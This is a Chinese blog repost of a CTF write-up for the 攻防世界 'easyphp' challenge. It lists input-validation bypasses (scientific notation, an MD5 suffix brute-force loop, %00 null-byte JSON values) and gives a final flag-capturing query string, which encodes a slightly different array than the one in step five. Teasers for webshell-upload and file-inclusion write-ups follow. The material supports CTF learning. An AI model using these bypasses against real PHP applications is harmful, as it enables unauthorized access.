攻防世界ctf web easyphp题解wp

9月前作者：中原第一高手分类：Toy博客阅读(44) 违法举报

这篇具有很好参考价值的文章主要介绍了攻防世界ctf web easyphp题解wp。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

第一步，用科学计数法绕过 a=1e9

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3)#$a=1e9

第二步，用php代码编写MD5碰撞脚本得到b=53724

for($i = 1;$i <= 100000;$i++){
    if('8b184b' === substr(md5($i),-6,6)){
        echo $i."<br>".md5($i);
    }
}

第三步，绕过is_numeric函数

$c=(array)json_decode(@$_GET['c']); #接收json格式的字符串并将其转化为数组

c={"m":"2033%00"}#使用%00可以绕过is_numeric函数

第四步，绕过is_array函数

c={"m":"2033%00","n":[[1]]}

第五步，绕过array_search函数

c={"m":"2033%00","n":[[0,2],0]}


#对{"m":"2033%00","n":[[0,2],0]}进行url编码得到：
%7B%22m%22%3A%222033%2500%22%2C%22n%22%3A%5B%5B1%5D%2C0%5D%7D

一定要对传值url编码

?a=1e9&b=53724&c=%7B%22m%22%3A%222033%2500%22%2C%22n%22%3A%5B%5B1%5D%2C0%5D%7D

提交得到flag

ctf easy php,php,安全,web安全

文章来源地址https://www.toymoban.com/news/detail-596409.html

到了这里，关于攻防世界ctf web easyphp题解wp的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

[CTF/网络安全] 攻防世界 php_rce 解题详析

PHP RCE 指的是通过远程代码执行漏洞（Remote Code Execution）来攻击 PHP 程序的一种方式。简单来说，由于PHP应用程序没有正确处理外部输入数据（如用户提交的表单、请求参数等），攻击者通过某些手段向 PHP 应用程序中注入恶意代码，然后通过这些恶意代码实现对受攻击服务器

2024年02月06日
浏览(54)
[CTF/网络安全] 攻防世界 simple_php 解题详析

题目描述：小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 $a=@$_GET[\\\'a\\\']; 从HTTP GET请求参数中获取一个名为a的变量，并将其赋值给变量a。@符号用于禁止错误输出，如果不存在参数a则会将变量a设置为NULL。 $b=@$_GET[\\\'b\\\']; 从HTTP GET请求参数中获取一个名为b的变量，

2024年02月13日
浏览(48)
[CTF/网络安全] 攻防世界 fileinclude 解题详析（php伪协议）

由于index.php在/var/www/html目录下，而flag.php与index.php同为php文件，故猜想flag.php也在该目录下。查看页面源代码获取更多信息：源代码中看到 @include($lan.\\\".php\\\"); ，即此处存在文件包含。又因为 $lan = $_COOKIE[\\\'language\\\']; 因此解题思路为：利用php伪协议，构造language参数，来读取该目

2024年02月07日
浏览(47)
[CTF/网络安全] 攻防世界 file_include 解题详析（php伪协议+convert转换过滤器）

题目描述：怎么读取文件呢？思路：由代码审计可知，可通过filename参数构造POC，来读取check.php POC的构造涉及PHP伪协议，参考链接：文件包含 | PHP伪协议实战 POC：回显如下：猜测被过滤，怎么办呢？该题涉及到 convert转换过滤器常见的convert转换过滤器有这两种：

2024年02月07日
浏览(72)
小迪安全20WEB 攻防-PHP 特性&缺陷对比函数&CTF 考点&CMS 审计实例

#研究对象 PHP代码漏洞（代码问题） # 知识点： 1 、过滤函数缺陷绕过 2 、 CTF 考点与代码审计一、原理-缺陷函数-使用讲解-本地内置函数：大部分是比较函数（过滤时使用的函数）（1）、== 与 === ：参考： PHP 浅谈 == 和=== 中，数字和字符串比较的问题。_php 数字==字符串

2024年01月19日
浏览(56)
CTF-攻防世界web新手入门篇

攻防世界网址 https://adworld.xctf.org.cn 新手篇虽然非常简单，但是对于小白来说这种最常见的常识或者思路可能不熟悉，所以在这里给大家分享一下最不起眼的小常识或者小技巧。 1、view_source 访问题目场景，如下图鼠标右击不能用，但是F12也可以看源码，发现有个脚本是实现

2024年02月06日
浏览(47)
【web | CTF】攻防世界 wife_wife

目录步骤1：峰回路转步骤2：JavaScript原型链污染步骤3：fuzz测试总结：题目意义对英语无感的我一开始没看到有个注册的提示，还以为暴力破解，看了一下题目才知道不需要暴力破解来到注册页面，就发现有点吊了，is admin可以勾选，居然能注册管理员，有点搞笑，不切

2024年02月07日
浏览(39)
CTF wed安全（攻防世界）练习题

进入网站如图：翻译：在这个小小的挑战训练中，你将学习Robots exclusion standard。网络爬虫使用robots.txt文件来检查它们是否被允许抓取和索引您的网站或只是其中的一部分。有时这些文件会暴露目录结构，而不是保护内容不被抓取。好好享受吧！步骤一：进入robots.txt文

2024年04月17日
浏览(45)
[CTF/网络安全]攻防世界 easyupload 解题详析

题目描述：一名合格的黑客眼中，所有的上传点都是开发者留下的后门惯例，上传一句话木马回显如下：也就是说文件被过滤抓包改后缀，.php1~.php9、.htaccess均被过滤（.htaccess 文件是一个用于配置 Apache Web 服务器的配置文件。它通常位于网站根目录或特定目录中，用来为该

2024年02月08日
浏览(59)
[CTF/网络安全] 攻防世界 backup 解题详析

题目描述：X老师忘记删除备份文件，他派小宁同学去把备份文件找出来,一起来帮小宁同学吧！ PHP 脚本文件的备份文件名，通常采用以下命名方式：在原始文件名后添加日期时间戳。例如，如果要备份名为 index.php 的文件，则可以将其备份文件命名为 index_20230521_004017.php。这

2024年02月05日
浏览(66)